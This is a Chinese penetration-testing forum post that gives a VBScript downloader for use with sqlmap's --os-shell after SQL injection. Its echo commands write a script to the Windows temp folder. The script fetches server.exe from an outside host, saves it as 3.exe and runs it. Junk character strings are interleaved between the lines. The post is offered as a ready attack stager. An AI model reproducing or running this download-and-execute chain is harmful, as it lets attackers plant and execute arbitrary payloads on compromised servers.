中国网络渗透测试联盟
标题:
vbs下载者,适合sqlmap --os-shell使用
[打印本页]
作者:
admin
时间:
2016-4-12 16:08
标题:
vbs下载者,适合sqlmap --os-shell使用
echo ^Set Post = CreateObject("Msxml2.XMLHTTP")^ >>c:\windows\temp\666999.txt
4 N+ ~) Y5 S+ i/ x5 O
echo ^Set Shell = CreateObject("Wscript.Shell")^ >>c:\windows\temp\666999.txt
$ V7 @( n M9 R. J
echo ^Post.Open "GET","http://www.baido.hk/server.exe",0^ >>c:\windows\temp\666999.txt
F4 q. g# A! `9 z
echo ^Post.Send()^ >>c:\windows\temp\666999.txt
4 x% D: { L: ~' K
echo ^Set aGet = CreateObject("ADODB.Stream")^ >>c:\windows\temp\666999.txt
* j6 O0 i q' i9 j# V/ ]7 Z7 w+ z
echo ^aGet.Mode = 3^ >>c:\windows\temp\666999.txt
& u, u# e3 T" y1 V! v3 V2 d
echo ^aGet.Type = 1^ >>c:\windows\temp\666999.txt
- l' _1 T6 H5 M5 [
echo ^aGet.Open()^ >>c:\windows\temp\666999.txt
$ r# r# w* K' _
echo ^aGet.Write(Post.responseBody)^ >>c:\windows\temp\666999.txt
8 S* `. e( |" v/ B8 s
echo ^aGet.SaveToFile "c:\windows\temp\3.exe",2^ >>c:\windows\temp\666999.txt
$ ]5 B( f- `3 E( P' k
echo ^wscript.sleep 1000^ >>c:\windows\temp\666999.txt
5 G' W; r4 ~) b2 q3 ~; m
echo ^Shell.Run ("c:\windows\temp\3.exe")^ >>c:\windows\temp\666999.txt
" T' X1 Q/ F* {6 u6 s$ @/ a
' I ^- B( ~3 W% @, w8 Z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2